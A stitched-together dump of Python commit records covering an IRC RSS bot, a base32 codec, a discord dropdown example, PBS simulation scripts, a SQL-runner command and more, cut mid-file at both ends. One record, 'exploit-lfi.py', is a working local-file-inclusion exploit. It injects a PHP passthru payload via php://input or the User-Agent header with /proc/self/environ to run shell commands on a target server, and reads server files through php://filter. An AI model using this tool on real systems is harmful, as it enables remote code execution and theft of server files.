feed, url = pieces[0:2]
interval = 180
if len(pieces) == 3:
interval = int(pieces[2])
if interval < 120:
interval = 120
if feed in self.config['feeds']:
self.chanmsg('Feed already exists: %s' % feed)
return
self.items[feed] = []
self.config['feeds'][feed] = {
'url': url,
'interval': interval,
}
self.save()
self.chanmsg('Feed %s successfully added' % feed)
self.query_feed(feed)
def do_addfilter(self, user, params):
pieces = params.split(' ', 1)
if len(pieces) != 2:
self.chanmsg('Usage !rss addfilter <feed> <string>')
return
feed, filter = pieces
if feed not in self.config['feeds']:
self.chanmsg('No such feed found')
return
self.config['feeds'][feed]['filter'] = filter
self.save()
self.chanmsg('Filter added for %s' % feed)
def do_removefilter(self, user, feed):
if feed not in self.config['feeds']:
self.chanmsg('No such feed found')
return
if 'filter' in self.config['feeds'][feed]:
del self.config['feeds'][feed]['filter']
self.save()
self.chanmsg('Filter removed from %s' % feed)
def do_remove(self, user, feed):
if not feed:
self.chanmsg('Usage !rss remove <feed>')
return
if feed not in self.config['feeds']:
self.chanmsg('Feed not found: %s' % feed)
if 'feed_%s' % feed in self.scheduled:
self.scheduled['feed_%s' % feed].cancel()
del self.scheduled['feed_%s' % feed]
del self.config['feeds'][feed]
self.save()
self.chanmsg('Feed %s successfully removed' % feed)
def do_list(self, user, params):
if not len(self.config['feeds']):
self.chanmsg('No feeds found')
return
l = []
for feed in self.config['feeds']:
filter = ''
if 'filter' in self.config['feeds'][feed]:
filter = '{%s}' % self.config['feeds'][feed]['filter']
l.append('%s(%s)[%s]%s' % \
(feed,
self.config['feeds'][feed]['interval'],
self.config['feeds'][feed]['url'],
filter))
self.chanmsg(' '.join(l))
def do_latest(self, user, feed):
if not feed:
self.chanmsg('Usage: !rss latest <name>')
return
if feed not in self.config['feeds']:
self.chanmsg('No such feed found')
return
if feed not in self.items:
self.chanmsg('No items found')
return
count = 0
for item in self.items[feed]:
self.chanmsg('%s %s' % (str(item['title']), str(item['link'])))
count += 1
if count == 3:
break
def do_refresh(self, user, feed):
if not feed:
self.chanmsg('Usage: !rss refresh <name>')
return
if feed not in self.config['feeds']:
self.chanmsg('No such feed found')
return
if 'feed_%s' % feed in self.scheduled:
self.scheduled['feed_%s' % feed].cancel()
del self.scheduled['feed_%s' % feed]
self.query_feed(feed)
@inlineCallbacks
def query_feed(self, feed):
url = self.config['feeds'][feed]['url']
interval = self.config['feeds'][feed]['interval']
filter = None
if 'filter' in self.config['feeds'][feed]:
filter = self.config['feeds'][feed]['filter']
try:
data = yield client.getPage(url)
except:
self.log('I failed at checking %s' % feed)
self.scheduled['feed_%s' % feed] = \
reactor.callLater(interval, self.query_feed, feed)
return
try:
dom = minidom.parseString(data)
except:
self.log('XML parse failed (%s)' % feed)
self.scheduled['feed_%s' % feed] = \
reactor.callLater(interval, self.query_feed, feed)
return
first = False
if not len(self.items[feed]):
first = True
items = dom.getElementsByTagName('item')
for item in items:
titleorig = item.getElementsByTagName(
'title')[0].childNodes[0].nodeValue.encode('UTF-8')
try:
title = titleorig.decode('UTF-8').encode('ISO-8859-1')
except:
title = titleorig
link = item.getElementsByTagName(
'link')[0].childNodes
if len(link):
link = link[0].nodeValue
else:
link = ''
link = self.bot.factory.web.urlstorage.addURL(link)
description = item.getElementsByTagName('description')
if description:
description = description[0].childNodes[0].nodeValue
else:
description = ''
guid = item.getElementsByTagName('guid')
if guid:
guid = guid[0].childNodes[0].nodeValue
else:
guid = md5.md5(title).hexdigest()
if filter and not (title.lower().count(filter.lower()) or \
description.count(filter.lower())):
continue
if guid not in [x['guid'] for x in self.items[feed]]:
# Yes, we now keep every item we've ever seen (in this session)
# to prevent excess flood when certain rss feeds (devblog)
# fuck up
self.items[feed].append({
'guid': guid,
'title': title,
'link': link,
'found': time.time(),
})
if not first:
self.log('I would like to announce on %s: %s' % \
(feed, guid))
self.chanmsg('[%s] %s %s' % (feed, str(title), str(link)))
self.scheduled['feed_%s' % feed] = \
reactor.callLater(interval, self.query_feed, feed)
# vim: set et sw=4:
| Python | 0.000001 | |
97eabd4e33086c66372b0e15dd1eeda12e99f427 | Create createfile.py | createfile.py | createfile.py | import os
#creates file on the go on the entries of a tuple
ports=[20,21,23,25,43,49,53,69,70,79,80,109,110,115,137,139,143,161,194,389,443,444,458,546,547,1080]
path=raw_input('Enter the path you want to create the files: ')
try:
os.chdir(path)
except:
print "Invalid Path"
try:
for i in ports:
for i in ports:
file = open('./'+str(i),'w')
file.close()
except:
print "Could not create files, please check if you have the appropriate read/write permissions
| Python | 0.000004 | |
6d50dc3c266f4a1b7f517935b961cfb20602011b | add benchmark.py | suite/benchmark.py | suite/benchmark.py | #!/usr/bin/python
# Simple benchmark for Capstone by disassembling random code. By Nguyen Anh Quynh, 2014
from capstone import *
from time import time
from random import randint
def random_str(size):
lst = [str(randint(0, 255)) for _ in xrange(size)]
return "".join(lst)
def cs(md, data):
insns = md.disasm(data, 0)
# uncomment below line to speed up this function 200 times!
# return
for i in insns:
if i.address == 0x100000:
print i
md = Cs(CS_ARCH_X86, CS_MODE_32)
md.detail = False
# warm up few times
for i in xrange(3):
data = random_str(128)
cs(md, data)
# start real benchmark
c_t = 0
for i in xrange(10000):
code = random_str(128)
t1 = time()
cs(md, code)
c_t += time() - t1
print "Capstone:", c_t, "seconds"
| Python | 0.000003 | |
95c0d34be2699ee85d23a32384d408ac25561978 | Normalize to str to work around Unicode for now | base32_crockford.py | base32_crockford.py | """
base32-crockford
================
A Python module implementing the alternate base32 encoding as described
by Douglas Crockford at: http://www.crockford.com/wrmg/base32.html.
According to his description, the encoding is designed to:
* Be human and machine readable
* Be compact
* Be error resistant
* Be pronounceable
It uses a symbol set of 10 digits and 22 letters, excluding I, L O and
U. Decoding is not case sensitive, and 'i' and 'l' are converted to '1'
and 'o' is converted to '0'. Encoding uses only upper-case characters.
Hyphens can be present in symbol strings to improve readability, and
are removed when decoding.
A check symbol can be appended to a symbol string to detect errors
within the string.
"""
import string
__all__ = ["encode", "decode", "normalize"]
# The encoded symbol space does not include I, L, O or U;
# the last five symbols are exclusively for checksum values
SYMBOLS = "0123456789ABCDEFGHJKMNPQRSTVWXYZ*~$=U"
ENCODE_SYMBOLS = {i: ch for (i, ch) in enumerate(SYMBOLS)}
DECODE_SYMBOLS = {ch: i for (i, ch) in enumerate(SYMBOLS)}
NORMALIZE_SYMBOLS = string.maketrans("IiLlOo", "111100")
BASE = 32
CHECK_BASE = 37
def encode(number, checksum=False):
"""
Encodes a base 10 positive integer into a symbol string.
Raises a ValueError on invalid input.
If checksum is set to True, a check symbol will also be
calculated and appended to the string.
"""
number = int(number)
if number < 0:
raise ValueError("Number '%d' is not a positive integer" % number)
check_symbol = ''
if checksum:
check_symbol = ENCODE_SYMBOLS[number % CHECK_BASE]
if number == 0:
return '0' + check_symbol
symbol_string = ''
while number > 0:
remainder = number % BASE
number //= BASE
symbol_string = ENCODE_SYMBOLS[remainder] + symbol_string
return symbol_string + check_symbol
def decode(symbol_string, checksum=False, strict=False):
"""
Decodes a given symbol string into a base 10 number.
Raises a ValueError on invalid input.
If checksum is set to True, the string is assumed to have a
trailing check symbol which will be validated. If the
checksum validation fails, a ValueError is raised.
If strict is set to True, a ValueError is raised if the
normalization step requires changes to the string.
"""
symbol_string = normalize(symbol_string, strict=strict)
if checksum:
symbol_string, check_symbol = symbol_string[:-1], symbol_string[-1]
# The letter 'U' is only valid as a check symbol
if 'U' in symbol_string:
raise ValueError("String '%s' contains invalid characters" %
symbol_string)
number = 0
for symbol in symbol_string:
number = number * BASE + DECODE_SYMBOLS[symbol]
if checksum:
check_value = DECODE_SYMBOLS[check_symbol]
modulo = number % CHECK_BASE
if check_value != modulo:
raise ValueError("Invalid check symbol '%s' for string '%s'" %
(check_symbol, symbol_string))
return number
def normalize(symbol_string, strict=False):
"""
Normalizes a given symbol string to account for error
resistance and prepare it for decoding. These transformations
are applied:
1. Hyphens are removed
2. 'I', 'i', 'L' or 'l' are converted to '1'
3. 'O' or 'o' are converted to '0'
4. All characters are converted to uppercase
If the strict parameter is set to True, a ValueError is raised
if any of the above transformations are applied.
"""
string = str(symbol_string).translate(NORMALIZE_SYMBOLS, '-').upper()
if strict and string != symbol_string:
raise ValueError("Normalization required for string '%s'" %
symbol_string)
return string
| """
base32-crockford
================
A Python module implementing the alternate base32 encoding as described
by Douglas Crockford at: http://www.crockford.com/wrmg/base32.html.
According to his description, the encoding is designed to:
* Be human and machine readable
* Be compact
* Be error resistant
* Be pronounceable
It uses a symbol set of 10 digits and 22 letters, excluding I, L O and
U. Decoding is not case sensitive, and 'i' and 'l' are converted to '1'
and 'o' is converted to '0'. Encoding uses only upper-case characters.
Hyphens can be present in symbol strings to improve readability, and
are removed when decoding.
A check symbol can be appended to a symbol string to detect errors
within the string.
"""
import string
__all__ = ["encode", "decode", "normalize"]
# The encoded symbol space does not include I, L, O or U;
# the last five symbols are exclusively for checksum values
SYMBOLS = "0123456789ABCDEFGHJKMNPQRSTVWXYZ*~$=U"
ENCODE_SYMBOLS = {i: ch for (i, ch) in enumerate(SYMBOLS)}
DECODE_SYMBOLS = {ch: i for (i, ch) in enumerate(SYMBOLS)}
NORMALIZE_SYMBOLS = string.maketrans("IiLlOo", "111100")
BASE = 32
CHECK_BASE = 37
def encode(number, checksum=False):
"""
Encodes a base 10 positive integer into a symbol string.
Raises a ValueError on invalid input.
If checksum is set to True, a check symbol will also be
calculated and appended to the string.
"""
number = int(number)
if number < 0:
raise ValueError("Number '%d' is not a positive integer" % number)
check_symbol = ''
if checksum:
check_symbol = ENCODE_SYMBOLS[number % CHECK_BASE]
if number == 0:
return '0' + check_symbol
symbol_string = ''
while number > 0:
remainder = number % BASE
number //= BASE
symbol_string = ENCODE_SYMBOLS[remainder] + symbol_string
return symbol_string + check_symbol
def decode(symbol_string, checksum=False, strict=False):
"""
Decodes a given symbol string into a base 10 number.
Raises a ValueError on invalid input.
If checksum is set to True, the string is assumed to have a
trailing check symbol which will be validated. If the
checksum validation fails, a ValueError is raised.
If strict is set to True, a ValueError is raised if the
normalization step requires changes to the string.
"""
symbol_string = normalize(symbol_string, strict=strict)
if checksum:
symbol_string, check_symbol = symbol_string[:-1], symbol_string[-1]
# The letter 'U' is only valid as a check symbol
if 'U' in symbol_string:
raise ValueError("String '%s' contains invalid characters" %
symbol_string)
number = 0
for symbol in symbol_string:
number = number * BASE + DECODE_SYMBOLS[symbol]
if checksum:
check_value = DECODE_SYMBOLS[check_symbol]
modulo = number % CHECK_BASE
if check_value != modulo:
raise ValueError("Invalid check symbol '%s' for string '%s'" %
(check_symbol, symbol_string))
return number
def normalize(symbol_string, strict=False):
"""
Normalizes a given symbol string to account for error
resistance and prepare it for decoding. These transformations
are applied:
1. Hyphens are removed
2. 'I', 'i', 'L' or 'l' are converted to '1'
3. 'O' or 'o' are converted to '0'
4. All characters are converted to uppercase
If the strict parameter is set to True, a ValueError is raised
if any of the above transformations are applied.
"""
string = symbol_string.translate(NORMALIZE_SYMBOLS, '-').upper()
if strict and string != symbol_string:
raise ValueError("Normalization required for string '%s'" %
symbol_string)
return string
| Python | 0 |
78aea51f508a14bb1b03b49933576c84b56a7459 | Add an example for the new dropdowns | examples/views/dropdown.py | examples/views/dropdown.py | import typing
import discord
from discord.ext import commands
# Defines a custom Select containing colour options
# that the user can choose. The callback function
# of this class is called when the user changes their choice
class Dropdown(discord.ui.Select):
def __init__(self):
# Set the options that will be presented inside the dropdown
options = [
discord.SelectOption(label='Red', description='Your favourite colour is red', emoji='🟥'),
discord.SelectOption(label='Green', description='Your favourite colour is green', emoji='🟩'),
discord.SelectOption(label='Blue', description='Your favourite colour is blue', emoji='🟦')
]
# The placeholder is what will be shown when no option is chosen
# The min and max values indicate we can only pick one of the three options
# The options parameter defines the dropdown options. We defined this above
super().__init__(placeholder='Choose your favourite colour...', min_values=1, max_values=1, options=options)
async def callback(self, interaction: discord.Interaction):
# Use the interaction object to send a response message containing
# the user's favourite colour or choice. The self object refers to the
# Select object, and the values attribute gets a list of the user's
# selected options. We only want the first one.
await interaction.response.send_message(f'Your favourite colour is {self.values[0]}')
class DropdownView(discord.ui.View):
def __init__(self):
super().__init__()
# Adds the dropdown to our view object.
self.add_item(Dropdown())
class Bot(commands.Bot):
def __init__(self):
super().__init__(command_prefix=commands.when_mentioned_or('$'))
async def on_ready(self):
print(f'Logged in as {self.user} (ID: {self.user.id})')
print('------')
bot = Bot()
@bot.command()
async def colour(ctx):
"""Sends a message with our dropdown containing colours"""
# Create the view containing our dropdown
view = DropdownView()
# Sending a message containing our view
await ctx.send('Pick your favourite colour:', view=view)
bot.run('token')
| Python | 0.000003 | |
bcb6c0780aacf77069a08f8d5b44d295881d9b9d | Create solution to swap odd even characters | swapOddEvenChar.py | swapOddEvenChar.py | #Python3
word = list(input().strip())
for i in range(0,len(word),2):
if(i+1>=len(word)):
break
word[i],word[i+1] = word[i+1],word[i]
print(''.join(word)) | Python | 0.000001 | |
7bde47d48f4e80b4449049a8b05767b30eb2c516 | Add stupid CSV export example | utilities/export-csv.py | utilities/export-csv.py | #!/usr/bin/python
import os
import csv
import sys
sys.path.append('../pynipap')
import pynipap
class Export:
def __init__(self, xmlrpc_uri):
self.xmlrpc_uri = xmlrpc_uri
def write(self, output_file, schema_name):
"""
"""
f = open(output_file, "w+")
writer = csv.writer(f, quoting=csv.QUOTE_MINIMAL)
pynipap.xmlrpc_uri = xmlrpc_uri
ao = pynipap.AuthOptions({ 'authoritative_source': 'nipap' })
import socket,xmlrpclib
try:
schema = pynipap.Schema.list({ 'name': schema_name })[0]
except socket.error:
print >> sys.stderr, "Connection refused, please check hostname & port"
sys.exit(1)
except xmlrpclib.ProtocolError:
print >> sys.stderr, "Authentication failed, please check your username / password"
sys.exit(1)
except IndexError:
print >> sys.stderr, "Non existing schema (", schema_name, ")"
sys.exit(1)
res = pynipap.Prefix.smart_search(schema, ' ', { 'include_all_parents': True })
for p in res['result']:
writer.writerow([p.display_prefix, p.type, p.node, p.order_id, p.description])
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser()
parser.add_option('--username', default='', help="Username")
parser.add_option('--password', default='', help="Password")
parser.add_option('--host', help="NIPAP backend host")
parser.add_option('--port', default=1337, help="NIPAP backend port")
parser.add_option('--schema', help="Schema name")
parser.add_option('--file', help="Output file")
(options, args) = parser.parse_args()
if options.host is None:
print >> sys.stderr, "Please specify the NIPAP backend host to work with"
sys.exit(1)
if options.schema is None:
print >> sys.stderr, "Please specify a schema to export"
sys.exit(1)
if options.file is None:
print >> sys.stderr, "Please specify an output file"
sys.exit(1)
auth_uri = ''
if options.username:
auth_uri = "%s:%s@" % (options.username, options.password)
xmlrpc_uri = "http://%(auth_uri)s%(host)s:%(port)s" % {
'auth_uri' : auth_uri,
'host' : options.host,
'port' : options.port
}
wr = Export(xmlrpc_uri)
wr.write(options.file, options.schema)
| Python | 0 | |
9b6eddb88f5de1b7c44d42e1d4a3dc1c90180862 | Implement deck. | onirim/deck.py | onirim/deck.py | import random
class Deck:
def __init__(self, cards):
self._undrawn = list(cards)
self._discarded = []
self._limbo = []
def draw(self, n=1):
"""Draw n cards."""
if n > len(self._undrawn) or n < 0:
raise ValueError()
drawn, self._undrawn = self._undrawn[:n], self._undrawn[n:]
return drawn
def put_discard(self, card):
"""Put a card to discard pile."""
self._discarded.append(card)
def put_limbo(self, card):
"""Put a card to Limbo pile."""
self._limbo.append(card)
def shuffle(self):
"""Shuffle the undrawn pile."""
random.shuffle(self._undrawn)
def shuffle_with_limbo(self):
"""Shuffle limbo pile back to undrawn pile."""
self._undrawn += self._limbo
self._limbo = []
random.shuffle(self._undrawn)
| Python | 0 | |
f5711401b79433f5b52e675cec67b63f6511836a | add tests file | tests.py | tests.py | #!flask/bin/python
import unittest
from server import app
def add(a, b):
return a+b
class TestCase(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
def tearDown(self):
pass
def test_add(self):
self.assertEqual(add(1, 2), 3)
self.assertEqual(add(3, 4), 7)
if __name__ == '__main__':
unittest.main() | Python | 0.000001 | |
d6c310043db9862dd49d35de6bea67e120e997c7 | Add file to generate a series of interfaces | simulations/interface.py | simulations/interface.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2017 Malcolm Ramsay <malramsay64@gmail.com>
#
# Distributed under terms of the MIT license.
"""Set running a series of simulations."""
import itertools
import os
import subprocess
from pathlib import Path
create_file = """#!/usr/bin/env python
#PBS -N create_interface
#PBS -m abe
#PBS -M malramsay64+quartz@gmail
#PBS -j oe
#PBS -o {outdir}/pbs.log
#PBS -l select=1:ncpus={ncpus}
#PBS -l walltime=500:00:00
#PBS -l cput=3600:00:00
#PBS -V
{array_flag}
import subprocess
import os
from pathlib import Path
def create_fname(mol, temp, pressure, mom_I, crys):
return mol + '-P' + pressure + '-T' + temp + '-I' + mom_I + '-' + crys + '.gsd'
all_values = {values}
job_index = int(os.environ.get('PBS_ARRAY_INDEX', 0))
temperature, pressure, moment_inertia, crystal = all_values[job_index]
temperature = '{{:.2f}}'.format(temperature)
pressure = '{{:.2f}}'.format(pressure)
moment_inertia = '{{:.2f}}'.format(moment_inertia)
ncpus = {ncpus}
common_opts = [
'--pressure', pressure,
'--temperature', temperature,
'--moment-inertia-scale', moment_inertia,
'--space-group', crystal,
'--output', '{outdir}',
]
run_comand = ['sdrun']
if ncpus > 1:
run_comand = [
'mpirun',
'--np', str(ncpus/2),
] + run_comand
init_temp = '0.39'
create_out = '{outdir}/' + create_fname('Trimer', init_temp, pressure, moment_inertia, crystal)
create_opts = [
'--space-group', crystal,
'--steps', '1000',
'--temperature', init_temp,
'--lattice-lengths', '48', '42',
create_out,
]
if not Path(create_out).exists():
print(' '.join(run_comand + ['create'] + common_opts + create_opts))
return_code = subprocess.call(run_comand + ['create'] + common_opts + create_opts)
assert return_code == 0
melt_out = '{outdir}/' + create_fname('Trimer', '{create_temp}', pressure, moment_inertia, crystal)
melt_opts = [
'--space-group', crystal,
'--steps', '{create_steps}',
'--equil-type', 'interface',
'--temperature', '{create_temp}',
create_out,
melt_out,
]
if not Path(melt_out).exists():
print(' '.join(run_comand + ['equil'] + common_opts + melt_opts))
return_code = subprocess.call(run_comand + ['equil'] + common_opts + melt_opts)
assert return_code == 0
"""
pbs_file = """#!/usr/bin/env python
#PBS -N interface_production
#PBS -m abe
#PBS -M malramsay64+quartz@gmail
#PBS -j oe
#PBS -o {outdir}/pbs.log
#PBS -l select=1:ncpus={ncpus}
#PBS -l walltime=500:00:00
#PBS -l cput=3600:00:00
#PBS -V
{array_flag}
import subprocess
import os
from pathlib import Path
def create_fname(mol, temp, pressure, mom_I, crys):
return mol + '-P' + pressure + '-T' + temp + '-I' + mom_I + '-' + crys + '.gsd'
all_values = {values}
job_index = int(os.environ.get('PBS_ARRAY_INDEX', 0))
temperature, pressure, moment_inertia, crystal = all_values[job_index]
temperature = '{{:.2f}}'.format(temperature)
pressure = '{{:.2f}}'.format(pressure)
moment_inertia = '{{:.2f}}'.format(moment_inertia)
ncpus = {ncpus}
common_opts = [
'--pressure', pressure,
'--temperature', temperature,
'--moment-inertia-scale', moment_inertia,
'--space-group', crystal,
'--output', '{outdir}',
]
run_comand = ['sdrun']
if ncpus > 1:
run_comand = [
'mpirun',
'--np', str(ncpus),
] + run_comand
create_out = '{outdir}/' + create_fname('Trimer', '{create_temp}', pressure, moment_inertia, crystal)
equil_out = '{outdir}/' + create_fname('Trimer', temperature, pressure, moment_inertia, crystal)
equil_opts = [
'--equil-type', 'interface',
'--init-temp', '{create_temp}',
'--steps', '{equil_steps}',
create_out,
equil_out,
]
subprocess.call(run_comand + ['equil'] + common_opts + equil_opts)
prod_opts = [
'--steps', '{prod_steps}',
'--no-dynamics',
equil_out,
]
subprocess.call(run_comand + ['prod'] + common_opts + prod_opts)
"""
temperatures = [0.3, 0.35, 0.4, 0.45, 0.5, 0.6, 0.8, 1.0, 1.5]
pressures = [1.]
mom_inertia = [1., 10., 100., 1000.]
crystals = ['p2', 'pg', 'p2gg']
outdir = Path.home() / 'tmp1m/2017-10-18-interface'
if __name__ == "__main__":
# ensure outdir exists
outdir.mkdir(exist_ok=True)
all_values = list(itertools.product(temperatures, pressures, mom_inertia, crystals))
create_temp = 1.80
create_values = list(itertools.product([create_temp], pressures, mom_inertia, crystals))
def get_array_flag(num_values: int) -> str:
if num_values == 1:
return ''
else:
return f'#PBS -J 0-{num_values-1}'
create_pbs = create_file.format(
values=create_values,
create_temp=create_temp,
array_flag=get_array_flag(len(create_values)),
outdir=outdir,
create_steps=100_000,
ncpus=8,
)
prod_pbs = pbs_file.format(
values=all_values,
array_flag=get_array_flag(len(all_values)),
outdir=outdir,
create_temp=create_temp,
equil_steps=1_000_000,
prod_steps=100_000_000,
ncpus=8,
)
create_process = subprocess.run(
['qsub'],
input=create_pbs,
encoding='utf-8',
stdout=subprocess.PIPE,
)
job_id = create_process.stdout
print(job_id)
subprocess.run(['qsub', '-W', 'depend=afterok:'+job_id],
input=prod_pbs,
encoding='utf-8',
env=os.environ,
)
with open(outdir / 'create_pbs.py', 'w') as tf:
tf.write(create_pbs)
with open(outdir / 'prod_pbs.py', 'w') as tf:
tf.write(prod_pbs)
| Python | 0 | |
e9d87a087a0f0102157d7c718a048c72f655c54a | Store registered refs as plugin metadata | smore/ext/marshmallow.py | smore/ext/marshmallow.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from marshmallow.compat import iteritems
from marshmallow import class_registry
from smore import swagger
from smore.apispec.core import Path
from smore.apispec.utils import load_operations_from_docstring
def schema_definition_helper(spec, name, schema, **kwargs):
"""Definition helper that allows using a marshmallow
:class:`Schema <marshmallow.Schema>` to provide Swagger
metadata.
:param type schema: A marshmallow Schema class.
"""
# Store registered refs, keyed by Schema class
plug = spec.plugins['smore.ext.marshmallow']
if 'refs' not in plug:
plug['refs'] = {}
plug['refs'][schema] = name
return swagger.schema2jsonschema(schema)
def schema_path_helper(view, **kwargs):
doc_operations = load_operations_from_docstring(view.__doc__)
if not doc_operations:
return
operations = doc_operations.copy()
for method, config in iteritems(doc_operations):
if 'schema' in config:
schema_cls = class_registry.get_class(config['schema'])
if not operations[method].get('responses'):
operations[method]['responses'] = {}
operations[method]['responses']['200'] = swagger.schema2jsonschema(schema_cls)
return Path(operations=operations)
def setup(spec):
spec.register_definition_helper(schema_definition_helper)
spec.register_path_helper(schema_path_helper)
| # -*- coding: utf-8 -*-
from __future__ import absolute_import
from marshmallow.compat import iteritems
from marshmallow import class_registry
from smore import swagger
from smore.apispec.core import Path
from smore.apispec.utils import load_operations_from_docstring
def schema_definition_helper(name, schema, **kwargs):
"""Definition helper that allows using a marshmallow
:class:`Schema <marshmallow.Schema>` to provide Swagger
metadata.
:param type schema: A marshmallow Schema class.
"""
return swagger.schema2jsonschema(schema)
def schema_path_helper(view, **kwargs):
doc_operations = load_operations_from_docstring(view.__doc__)
if not doc_operations:
return
operations = doc_operations.copy()
for method, config in iteritems(doc_operations):
if 'schema' in config:
schema_cls = class_registry.get_class(config['schema'])
if not operations[method].get('responses'):
operations[method]['responses'] = {}
operations[method]['responses']['200'] = swagger.schema2jsonschema(schema_cls)
return Path(operations=operations)
def setup(spec):
spec.register_definition_helper(schema_definition_helper)
spec.register_path_helper(schema_path_helper)
| Python | 0 |
e4734cb85458475ad4fd2cf66db456b7924d6fe0 | Add : LFI Exploit tool | exploit-lfi.py | exploit-lfi.py | #!/usr/bin/python
import argparse
import base64
import re
import requests
import sys
def scrap_results (content):
# regexp
regexp_start = re.compile ('.*STARTSTART.*')
regexp_end = re.compile ('.*ENDEND.*')
# results
results = list()
# result start and end
found_start = False
found_end = False
# getting lines
lines = content.split ('\n')
for line in lines:
if found_start and found_end:
break
if found_start == False and len (regexp_start.findall (line)) != 0:
# print 'found STARTSTART'
line = re.sub ('.*STARTSTART', '', line)
found_start = True
if found_start == True and found_end == False and len (regexp_end.findall (line)) != 0:
# print 'found ENDEND'
line = re.sub ('ENDEND.*', '', line)
found_end = True
if found_start == True and len (line) != 0:
results.append (line)
return results
# extract all potential base64 strings
# decode correct one and store potentials
def scrap_b64str (content):
# search for base64 strings, shorter than 16 chars is refused
regexp_b64 = re.compile ('[A-Za-z0-9+/=]{16,}=+')
words = regexp_b64.findall (content)
# validate each base64
# if validated it is added to our list
results = list()
for word in words:
found = True
decoded = ''
try:
decoded = base64.b64decode (word)
except Exception:
found = False
if found == False and len (re.findall ('=+$', word)) != 0:
decoded = word
found = True
if found == True and len (decoded) != 0:
results.append (decoded)
return results
parser = argparse.ArgumentParser(description='Exploit LFI')
parser.add_argument('--url', '-u', nargs=1, type=str, help='URL to attack', required=True)
parser.add_argument('--arg', '-a', nargs=1, type=str, help='Technique argument', required=True)
parser.add_argument('--technique', '-t', nargs=1, default='env', help='input, env or read')
args = parser.parse_args ()
payload = '<?php echo "STARTSTART"; passthru ("{0}"); echo "ENDEND"; ?>'.format (args.arg[0])
if args.technique[0] == 'input':
form = {
'' : payload
}
filename = 'php://input'
url = args.url[0].replace ('PAYLOAD', filename)
req = requests.get (url, data=form)
# print result
results = scrap_results (req.text)
for result in results:
print result
elif args.technique[0] == 'read':
php_filter = 'php://filter/convert.base64-encode/resource=' + args.arg[0]
url = args.url[0].replace ('PAYLOAD', php_filter)
req = requests.get (url)
# print result
results = scrap_b64str (req.text)
for result in results:
print result
else:
headers = {
'User-Agent' : payload
}
filename = '/proc/self/environ'
url = args.url[0].replace ('PAYLOAD', filename)
print url
req = requests.get (url, headers=headers)
# print result
results = scrap_results (req.text)
for result in results:
print result
| Python | 0.000001 | |
3654817845e1d22a5b0e648a79d0bf6db12c2704 | add run_sql shell command | treeherder/model/management/commands/run_sql.py | treeherder/model/management/commands/run_sql.py | import MySQLdb
from optparse import make_option
from django.core.management.base import BaseCommand
from treeherder.model.models import Datasource
from django.conf import settings
class Command(BaseCommand):
help = ("Runs an arbitrary sql statement or file"
" on a number of databases.")
option_list = BaseCommand.option_list + (
make_option(
'--datasources',
action='store',
dest='datasources',
default='all',
help='A comma separated list of datasources to execute the sql code on'),
make_option(
'--data-type',
action='store',
dest='data_type',
default='jobs',
choices=['jobs', 'objectstore'],
help='The target data-type of the sql code'),
make_option(
'-f', '--file',
dest='sql_file',
help='Sql source file',
metavar='FILE',
default="")
)
def handle(self, *args, **options):
if not options["sql_file"]:
self.stderr.write("No sql file provided!")
return
datasources = Datasource.objects.filter(contenttype=options['data_type'])
if options['datasources'] != 'all':
if ',' in options['datasources']:
datasources = datasources.filter(
project__in=options['datasources'].split(','))
else:
datasources = datasources.filter(
project=options['datasources'])
with open(options["sql_file"]) as sql_file:
sql_code = sql_file.read()
self.stdout.write("{0} datasource found".format(
len(datasources)
))
for datasource in datasources:
self.stdout.write("--------------------------")
db = MySQLdb.connect(
host=datasource.host,
db=datasource.name,
user=settings.TREEHERDER_DATABASE_USER,
passwd=settings.TREEHERDER_DATABASE_PASSWORD)
try:
cursor = db.cursor()
cursor.execute(sql_code)
self.stdout.write("Sql code executed on {0}".format(datasource))
except Exception as e:
error_string = "!!! Sql code execution failed on {0} !!!"
self.stderr.write(error_string.format(datasource))
self.stderr.write("{0}".format(e))
finally:
if cursor:
cursor.close()
| Python | 0.000002 | |
31924096f82954e87b33fcb4af2e7ea46a5c6336 | add map estimate of gaussian case | vlgp/gmap.py | vlgp/gmap.py | import click
# import jax
import numpy as onp
import jax.numpy as np
from jax.numpy import linalg
from .evaluation import timer
from .gp import sekernel
from .preprocess import get_config, get_params, initialize, fill_params, fill_trials
from .util import cut_trials
def make_prior(trials, n_factors, dt, var, scale):
for trial in trials:
n, ydim = trial['y'].shape
t = np.arange(n) * dt
K = sekernel(t, var, scale)
trial['bigK'] = np.kron(np.eye(n_factors), K)
def em(y, C, d, R, K, max_iter):
zdim, ydim = C.shape
n = K.shape[0]
m = y.shape[0]
bigK = np.kron(np.eye(zdim), K)
bigR = np.kron(np.eye(n), R)
Y = y.reshape(-1, ydim)
for i in range(max_iter):
# E step
with timer() as e_elapsed:
bigC = np.kron(C.T, np.eye(n))
A = bigK @ bigC.T
B = bigC @ A + bigR
residual = y - d[None, :]
residual = residual.transpose((0, 2, 1)).reshape(m, -1, 1)
z = A[None, ...] @ linalg.solve(B[None, ...], residual)
z = z.reshape(m, zdim, -1).transpose((0, 2, 1))
z -= z.mean(axis=(0, 1), keepdims=True)
# M step
with timer() as m_elapsed:
Z = z.reshape(-1, zdim)
C, d, r = leastsq(Y, Z) # Y = Z C + d
R = np.diag(r ** 2)
C /= linalg.norm(C)
click.echo("Iteration {:4d}, E-step {:.2f}s, M-step {:.2f}s".format(i + 1, e_elapsed(), m_elapsed()))
return z, C, d, R
def infer(trials, C, d, R):
for trial in trials:
n, ydim = trial['y'].shape
_, zdim = trial['mu'].shape
y = trial['y'] - d[None, :]
y = y.T.reshape(-1, 1)
bigC = np.kron(C.T, np.eye(n))
bigK = trial['bigK']
bigR = np.kron(np.eye(n), R)
A = bigK @ bigC.T
z = A @ linalg.solve(bigC @ A + bigR, y)
trial['mu'] = z.reshape((zdim, -1)).T
def leastsq(Y, Z, constant=True):
if constant:
Z = np.column_stack([Z, np.ones(Z.shape[0])])
C, r, *_ = onp.linalg.lstsq(Z, Y, rcond=None)
# C = linalg.solve(Z.T @ Z, Z.T @ Y)
return C[:-1, :], C[[-1], :], r
def loglik(y, z, C, d, R, var, scale, dt):
zdim, ydim = C.shape
m, n, _ = y.shape
t = np.arange(n) * dt
K = sekernel(t, var, scale)
bigK = np.kron(np.eye(zdim), K)
r = y - z @ C - d[None, :]
r = r @ (1 / np.sqrt(R))
Z = z.transpose((0, 2, 1)).reshape(m, -1, 1)
